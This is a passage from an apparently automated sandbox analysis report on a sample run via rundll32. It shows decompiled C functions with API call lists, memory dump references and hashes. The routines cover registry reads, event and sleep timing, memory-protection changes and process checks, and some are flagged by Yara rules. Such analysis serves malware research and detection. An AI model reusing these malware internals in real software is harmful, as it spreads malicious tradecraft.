                                                          								FindCloseChangeNotification(_t25); // executed; closes the event handle. The export shares its code with CloseHandle, so address-based API naming reports either label: read it as CloseHandle
                                                          							}
                                                          							goto L22;
                                                          						}
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          			}

                                                          Address column of the C listing above: 0x036d498f to 0x036d4a82

                                                          APIs
                                                            • Part of subcall function 036D11C3: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05969D70,00000000,?,?,69B25F44,00000005,036DA00C,4D283A53,?,?), ref: 036D11F9
                                                            • Part of subcall function 036D11C3: lstrcpy.KERNEL32(00000000,00000000), ref: 036D121D
                                                            • Part of subcall function 036D11C3: lstrcat.KERNEL32(00000000,00000000), ref: 036D1225
                                                          • CreateEventA.KERNEL32(036DA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,036D7187,?,?,?), ref: 036D49CF
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          • StrChrW.SHLWAPI(036D7187,00000020,61636F4C,00000001,00000000,?,?,00000000,?,036D7187,?,?,?), ref: 036D4A02
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,036D7187,00000000,00000000,?,00000000,?,036D7187,?,?,?), ref: 036D4A2F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,036D7187,?,?,?), ref: 036D4A5D
                                                          • FindCloseChangeNotification.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,036D7187,?,?,?), ref: 036D4A75
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ObjectSingleWait$ChangeCloseCreateEventFindFreeHeapNotificationlstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3294472205-0
                                                          • Opcode ID: ac85831c897438106d18f831255dcd5aae713b0ccff1aea24db06e34d557b2c6
                                                          • Instruction ID: ff319fd04a5e5c6b8a9606b5fcbb0b2887c44f886a7a8c9a23ace034c33fb1f5
                                                          • Opcode Fuzzy Hash: ac85831c897438106d18f831255dcd5aae713b0ccff1aea24db06e34d557b2c6
                                                          • Instruction Fuzzy Hash: 5A21E932D053116BC732EAAAAD45B6AB7D9EB48710B0D452AFD45DB24CDFB1CC018698
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0628B7A4: RegCreateKeyA.ADVAPI32(80000001,0689B7F0,?), ref: 0628B7B9
                                                            • Part of subcall function 0628B7A4: lstrlen.KERNEL32(0689B7F0,00000000,00000000,00000000,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C,00000008,00000003), ref: 0628B7E2
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F4C
                                                          • RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                                          • String ID:
                                                          • API String ID: 1633053242-0
                                                          • Opcode ID: e8ecddb125ee64f4de10ef5b871de956724f36854dea6bb326e10dfe4ef3e3b7
                                                          • Instruction ID: 1f017cbb9999d249fce18d516b3887516811f5d4918fcb62b25a613a2c5390ab
                                                          • Opcode Fuzzy Hash: e8ecddb125ee64f4de10ef5b871de956724f36854dea6bb326e10dfe4ef3e3b7
                                                          • Instruction Fuzzy Hash: BB113AB251024EBFDF019F95DC88CAE7B7EEB88258B100429FA0593110E7719D649B70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,?,?,?,0627111D,00000000), ref: 0628214D
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 06282166
                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0627111D,00000000), ref: 06282183
                                                          • IsWow64Process.KERNEL32(?,?,?,?,?,?,0627111D,00000000), ref: 06282194
                                                          • FindCloseChangeNotification.KERNEL32(?,?,?,?,0627111D,00000000), ref: 062821A7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                                                          • String ID:
                                                          • API String ID: 1712524627-0
                                                          • Opcode ID: dc9db8a06bab8c0fe95d3fb3d82f34e121ee176e2204ce4d57ed5ec99d68ac9f
                                                          • Instruction ID: 25f918896541037ba48d903079ea4defb365bc0dbf632bc2ffa01d5d9118dfe1
                                                          • Opcode Fuzzy Hash: dc9db8a06bab8c0fe95d3fb3d82f34e121ee176e2204ce4d57ed5ec99d68ac9f
                                                          • Instruction Fuzzy Hash: 2B016D71A12315FFCB11EF59EC4C89A7BA9FBCA6917204225EA05D3240E7314701CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 062733CA
                                                          • GetLastError.KERNEL32(?,00000000), ref: 062733D2
                                                          • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 062733E9
                                                          • VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0627340E
                                                          • SetLastError.KERNEL32(80000000,?,00000000), ref: 06273417
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Virtual$ErrorLastProtect$Query
                                                          • String ID:
                                                          • API String ID: 148356745-0
                                                          • Opcode ID: 0db5d81be3bc2d90f13af416bbd1c710034865d03345b90b3770399a2fa4b464
                                                          • Instruction ID: c68ffb5500f035b96a7f5f6c849e517fda4501e709da6aa5279949c003794aa2
                                                          • Opcode Fuzzy Hash: 0db5d81be3bc2d90f13af416bbd1c710034865d03345b90b3770399a2fa4b464
                                                          • Instruction Fuzzy Hash: C601E972600209BFDF129F95EC48CAEBBBAEF4D2547008036FA05E2225D7719954EFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 036D755B
                                                          • SysAllocString.OLEAUT32(036D3520), ref: 036D759F
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D75B3
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D75C1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 1931a46158cbfa044dd76e62e219d9c2dbeda2217728d09d1ed36065c603579a
                                                          • Instruction ID: c2ddf7000133c39b701a6bf26b388b292655c78393db870b745ae689844add0c
                                                          • Opcode Fuzzy Hash: 1931a46158cbfa044dd76e62e219d9c2dbeda2217728d09d1ed36065c603579a
                                                          • Instruction Fuzzy Hash: D5310E75D00249EFCB05DF98D8809AEBBB9FF48300B11842EF906D7250DB719641CF66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 41%
                                                          			E036D70D8(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                          				intOrPtr _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				void* __esi;
                                                          				void* _t20;
                                                          				void* _t26;
                                                          				void* _t29;
                                                          				void* _t38;
                                                          				signed int* _t39;
                                                          				void* _t40;
                                                          
                                                          				_t36 = __ecx;
                                                          				_v32 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v12 = _a4;
                                                          				_t20 = E036D54BB(__ecx,  &_v32); // executed
                                                          				_t38 = _t20;
                                                          				if(_t38 != 0) {
                                                          					L12:
                                                          					_t39 = _a8;
                                                          					L13:
                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                          						_t23 =  &(_t39[1]);
                                                          						if(_t39[1] != 0) {
                                                          							E036D78BF(_t23);
                                                          						}
                                                          					}
                                                          					return _t38;
                                                          				}
                                                          				_t26 = E036D3695(0x40,  &_v16); // executed
                                                          				if(_t26 != 0) {
                                                          					_v16 = 0;
                                                          				}
                                                          				_t40 = CreateEventA(0x36da34c, 1, 0,  *0x36da3e4);
                                                          				if(_t40 != 0) {
                                                          					SetEvent(_t40);
                                                          					Sleep(0xbb8); // executed
                                                          					FindCloseChangeNotification(_t40); // executed
                                                          				}
                                                          				_push( &_v32);
                                                          				if(_a12 == 0) {
                                                          					_t29 = E036D71B6(_t36); // executed
                                                          				} else {
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t29 = E036D3472(_t36);
                                                          				}
                                                          				_t41 = _v16;
                                                          				_t38 = _t29;
                                                          				if(_v16 != 0) {
                                                          					E036D3AC2(_t41);
                                                          				}
                                                          				if(_t38 != 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					_t39 = _a8;
                                                          					_t38 = E036D498E( &_v32, _t39);
                                                          					goto L13;
                                                          				}
                                                          			}

                                                          0x036d70d8
                                                          0x036d70e5
                                                          0x036d70eb
                                                          0x036d70ec
                                                          0x036d70ed
                                                          0x036d70ee
                                                          0x036d70ef
                                                          0x036d70f3
                                                          0x036d70fa
                                                          0x036d70ff
                                                          0x036d7103
                                                          0x036d718b
                                                          0x036d718b
                                                          0x036d718e
                                                          0x036d7190
                                                          0x036d7198
                                                          0x036d719e
                                                          0x036d71a1
                                                          0x036d71a1
                                                          0x036d719e
                                                          0x036d71ac
                                                          0x036d71ac
                                                          0x036d710f
                                                          0x036d7116
                                                          0x036d7118
                                                          0x036d7118
                                                          0x036d712f
                                                          0x036d7133
                                                          0x036d7136
                                                          0x036d7141
                                                          0x036d7148
                                                          0x036d7148
                                                          0x036d7151
                                                          0x036d7155
                                                          0x036d7163
                                                          0x036d7157
                                                          0x036d7157
                                                          0x036d7158
                                                          0x036d7159
                                                          0x036d715a
                                                          0x036d715b
                                                          0x036d715c
                                                          0x036d715c
                                                          0x036d7168
                                                          0x036d716b
                                                          0x036d716f
                                                          0x036d7171
                                                          0x036d7171
                                                          0x036d7178
                                                          0x00000000
                                                          0x036d717a
                                                          0x036d717a
                                                          0x036d7187
                                                          0x00000000
                                                          0x036d7187

                                                          APIs
                                                          • CreateEventA.KERNEL32(036DA34C,00000001,00000000,00000040,?,?,76CDF710,00000000,76CDF730), ref: 036D7129
                                                          • SetEvent.KERNEL32(00000000), ref: 036D7136
                                                          • Sleep.KERNEL32(00000BB8), ref: 036D7141
                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 036D7148
                                                            • Part of subcall function 036D71B6: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,036D7168,?), ref: 036D71DC
                                                            • Part of subcall function 036D71B6: RegEnumKeyExA.KERNEL32(?,?,?,036D7168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,036D7168), ref: 036D7223
                                                            • Part of subcall function 036D71B6: WaitForSingleObject.KERNEL32(00000000,?,?,?,036D7168,?,036D7168,?,?,?,?,?,036D7168,?), ref: 036D7290
                                                            • Part of subcall function 036D71B6: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,036D7168,?), ref: 036D72B8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 780868161-0
                                                          • Opcode ID: 54fc6eb9ed64901f0db5914febb51d2c1ff3e00b9d75da9fba5ed1801b8790b8
                                                          • Instruction ID: 01724fd9fb94c4f55e2558b2c3ba4c7aa7c9799cf95133f567b76bc0f44e39c0
                                                          • Opcode Fuzzy Hash: 54fc6eb9ed64901f0db5914febb51d2c1ff3e00b9d75da9fba5ed1801b8790b8
                                                          • Instruction Fuzzy Hash: 5F218476D00219ABDB20FFE4DD84CDEBBBDAB48350B0D4529EA11EB304D73499458BA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D12CA(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                                                          				long _t26;
                                                          				intOrPtr* _t38;
                                                          				char* _t42;
                                                          				long _t43;
                                                          
                                                          				if(_a4 == 0) {
                                                          					L2:
                                                          					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                                                          					_t43 = _t26;
                                                          					if(_t43 == 0) {
                                                          						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                                                          						if(_a4 == 0) {
                                                          							_t43 = 0xe8;
                                                          						} else {
                                                          							_t42 = E036D6D63(_a4);
                                                          							if(_t42 == 0) {
                                                          								_t43 = 8;
                                                          							} else {
                                                          								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                                                          								if(_t43 != 0) {
                                                          									E036D6C2C(_t42);
                                                          								} else {
                                                          									 *_a20 = _t42;
                                                          									_t38 = _a24;
                                                          									if(_t38 != 0) {
                                                          										 *_t38 = _a4;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						RegCloseKey(_a12); // executed
                                                          					}
                                                          					L12:
                                                          					return _t43;
                                                          				}
                                                          				_t43 = E036D6500(_a4, _a8, _a12, _a16, _a20, _a24);
                                                          				if(_t43 == 0) {
                                                          					goto L12;
                                                          				}
                                                          				goto L2;
                                                          			}

                                                          0x036d12d6
                                                          0x036d12f9
                                                          0x036d1303
                                                          0x036d1309
                                                          0x036d130d
                                                          0x036d1325
                                                          0x036d132a
                                                          0x036d1372
                                                          0x036d132c
                                                          0x036d1334
                                                          0x036d1338
                                                          0x036d136f
                                                          0x036d133a
                                                          0x036d134c
                                                          0x036d1350
                                                          0x036d1366
                                                          0x036d1352
                                                          0x036d1355
                                                          0x036d1357
                                                          0x036d135c
                                                          0x036d1361
                                                          0x036d1361
                                                          0x036d135c
                                                          0x036d1350
                                                          0x036d1338
                                                          0x036d137a
                                                          0x036d137a
                                                          0x036d1381
                                                          0x036d1387
                                                          0x036d1387
                                                          0x036d12ef
                                                          0x036d12f3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RegOpenKeyW.ADVAPI32(80000002,05969E92,05969E92), ref: 036D1303
                                                          • RegQueryValueExW.KERNEL32(05969E92,?,00000000,80000002,00000000,00000000,?,036D3551,3D036D90,80000002,036D7168,00000000,036D7168,?,05969E92,80000002), ref: 036D1325
                                                          • RegQueryValueExW.ADVAPI32(05969E92,?,00000000,80000002,00000000,00000000,00000000,?,036D3551,3D036D90,80000002,036D7168,00000000,036D7168,?,05969E92), ref: 036D134A
                                                          • RegCloseKey.KERNEL32(05969E92,?,036D3551,3D036D90,80000002,036D7168,00000000,036D7168,?,05969E92,80000002,00000000,?), ref: 036D137A
                                                            • Part of subcall function 036D6500: SafeArrayDestroy.OLEAUT32(00000000), ref: 036D6588
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                                          • String ID:
                                                          • API String ID: 486277218-0
                                                          • Opcode ID: 34fa4f626b30ad0410e34cb42e880a5923ac62a8bbbb9abd228b133a80eb4cc1
                                                          • Instruction ID: 4b2d59656fabd365af8cb61cd244e378f17459004841eb33416f8aa06d3573bf
                                                          • Opcode Fuzzy Hash: 34fa4f626b30ad0410e34cb42e880a5923ac62a8bbbb9abd228b133a80eb4cc1
                                                          • Instruction Fuzzy Hash: 8B212C7280011DAFCF11EF94DC808EE7BA9FB05290B058426FE1596920D671DD60DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,062762DD,?,?,?,?), ref: 06289686
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0628969D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,062762DD,?,?,?,?,?,?,00000000), ref: 062896B8
                                                          • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,062762DD,?,?,?,?), ref: 062896D7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateFree
                                                          • String ID:
                                                          • API String ID: 4267586637-0
                                                          • Opcode ID: 547072463921f86a25dc4cb4ee241c815efc8d5ba90809c64c6efe5afcdfec32
                                                          • Instruction ID: 1d5fd385056daaf173f3bdb49f64cee07ccb4cf090f939c11da2680e7fe58c81
                                                          • Opcode Fuzzy Hash: 547072463921f86a25dc4cb4ee241c815efc8d5ba90809c64c6efe5afcdfec32
                                                          • Instruction Fuzzy Hash: 49114FB6910219FFDB12DF99DC84CEEBBBDEB88350B104056FD05A6150E2715E80DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 65%
                                                          			E036D4B89(void* __ecx, intOrPtr _a4) {
                                                          				struct _FILETIME _v12;
                                                          				int _t13;
                                                          				signed int _t16;
                                                          				void* _t18;
                                                          				signed int _t19;
                                                          				unsigned int _t23;
                                                          				void* _t30;
                                                          				signed int _t34;
                                                          
                                                          				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                                          				asm("stosd");
                                                          				do {
                                                          					_t13 = SwitchToThread();
                                                          					GetSystemTimeAsFileTime( &_v12);
                                                          					_t23 = _v12.dwHighDateTime;
                                                          					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                          					_push(0);
                                                          					_push(0x13);
                                                          					_push(_t23 >> 5);
                                                          					_push(_t16);
                                                          					L036D83A6();
                                                          					_t34 = _t16 + _t13;
                                                          					_t18 = E036D5D2E(_a4, _t34);
                                                          					_t30 = _t18;
                                                          					_t19 = 3;
                                                          					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                                          				} while (_t30 == 1);
                                                          				return _t30;
                                                          			}

                                                          0x036d4b8e
                                                          0x036d4b99
                                                          0x036d4b9a
                                                          0x036d4b9a
                                                          0x036d4ba6
                                                          0x036d4baf
                                                          0x036d4bb2
                                                          0x036d4bb6
                                                          0x036d4bb8
                                                          0x036d4bbd
                                                          0x036d4bbe
                                                          0x036d4bbf
                                                          0x036d4bc9
                                                          0x036d4bcc
                                                          0x036d4bd3
                                                          0x036d4bd7
                                                          0x036d4bde
                                                          0x036d4be4
                                                          0x036d4bee

                                                          APIs
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,036D1D14,?,?), ref: 036D4B9A
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,036D1D14,?,?), ref: 036D4BA6
                                                          • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 036D4BBF
                                                            • Part of subcall function 036D5D2E: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 036D5D8D
                                                          • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,036D1D14,?,?), ref: 036D4BDE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                                          • String ID:
                                                          • API String ID: 1610602887-0
                                                          • Opcode ID: b4c0f2e307e7096c892e2e802bdbb55d124651c01af604140dce899b1132ba81
                                                          • Instruction ID: 75c9797d5615042472cc7879c52487f1535a863ff45385b5911d7953db7cb28f
                                                          • Opcode Fuzzy Hash: b4c0f2e307e7096c892e2e802bdbb55d124651c01af604140dce899b1132ba81
                                                          • Instruction Fuzzy Hash: 5EF0AF77E002087BDB14ABA4EC1EF9E76F9DB84351F050128F606E7240EAB49A0086A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0629A170,00000000,06285D81,?,0627F2F7,?), ref: 062771D3
                                                          • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0629A170,00000000,06285D81,?,0627F2F7,?), ref: 062771DE
                                                          • _wcsupr.NTDLL ref: 062771EB
                                                          • lstrlenW.KERNEL32(00000000), ref: 062771F3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                                          • String ID:
                                                          • API String ID: 2533608484-0
                                                          • Opcode ID: f3ea24abff9ed03f0af76b77b2aeabaa4ff6f29e61600fa771bf83f69d4f0b4e
                                                          • Instruction ID: a0e6d6e98ccafb46ca0521e18bb4281039a2bb473322808ae6bdf4478d8f01c0
                                                          • Opcode Fuzzy Hash: f3ea24abff9ed03f0af76b77b2aeabaa4ff6f29e61600fa771bf83f69d4f0b4e
                                                          • Instruction Fuzzy Hash: 2DF0E932A113112F93D26A756C8CE6F579DBFC16A47100929FE24D2440DE74CC42C5B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0628C3A3
                                                            • Part of subcall function 06278FAE: RtlEnterCriticalSection.NTDLL(00000000), ref: 06278FBA
                                                            • Part of subcall function 06278FAE: CloseHandle.KERNEL32(?), ref: 06278FC8
                                                            • Part of subcall function 06278FAE: RtlLeaveCriticalSection.NTDLL(00000000), ref: 06278FE4
                                                          • CloseHandle.KERNEL32(?), ref: 0628C3B1
                                                          • InterlockedDecrement.KERNEL32(0629A05C), ref: 0628C3C0
                                                            • Part of subcall function 0628E831: SetEvent.KERNEL32(000005A0,0628C3DB), ref: 0628E83B
                                                            • Part of subcall function 0628E831: CloseHandle.KERNEL32(000005A0), ref: 0628E850
                                                            • Part of subcall function 0628E831: HeapDestroy.KERNELBASE(064A0000), ref: 0628E860
                                                          • RtlExitUserThread.NTDLL(00000000), ref: 0628C3DC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                                          • String ID:
                                                          • API String ID: 1141245775-0
                                                          • Opcode ID: cb38811cff3896d8e79346d3a83231273ccefde1761c44e77827e5010766f532
                                                          • Instruction ID: 939140d549a29bc97b59f861737447f15303cf66e40c6ab625d0e35db5d1d470
                                                          • Opcode Fuzzy Hash: cb38811cff3896d8e79346d3a83231273ccefde1761c44e77827e5010766f532
                                                          • Instruction Fuzzy Hash: 26F0A430661304AFDB426B689C49F9D3769FB86730B510318FA25A71C0DB749C02CBB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E036D765B(void** __esi) {
                                                          				intOrPtr _v0;
                                                          				intOrPtr _t4;
                                                          				intOrPtr _t6;
                                                          				void* _t8;
                                                          				void* _t9;
                                                          				intOrPtr _t10;
                                                          				void* _t11;
                                                          				void** _t13;
                                                          
                                                          				_t13 = __esi;
                                                          				_t4 =  *0x36da3cc; // 0x59695b0
                                                          				__imp__(_t4 + 0x40);
                                                          				while(1) {
                                                          					_t6 =  *0x36da3cc; // 0x59695b0
                                                          					_t1 = _t6 + 0x58; // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t8 =  *_t13;
                                                          				if(_t8 != 0 && _t8 != 0x36da030) {
                                                          					HeapFree( *0x36da2d8, 0, _t8);
                                                          				}
                                                          				_t9 = E036D6E6D(_v0, _t13); // executed
                                                          				_t13[1] = _t9;
                                                          				_t10 =  *0x36da3cc; // 0x59695b0
                                                          				_t11 = _t10 + 0x40;
                                                          				__imp__(_t11);
                                                          				return _t11;
                                                          			}

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(05969570), ref: 036D7664
                                                          • Sleep.KERNEL32(0000000A), ref: 036D766E
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D7696
                                                          • RtlLeaveCriticalSection.NTDLL(05969570), ref: 036D76B2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
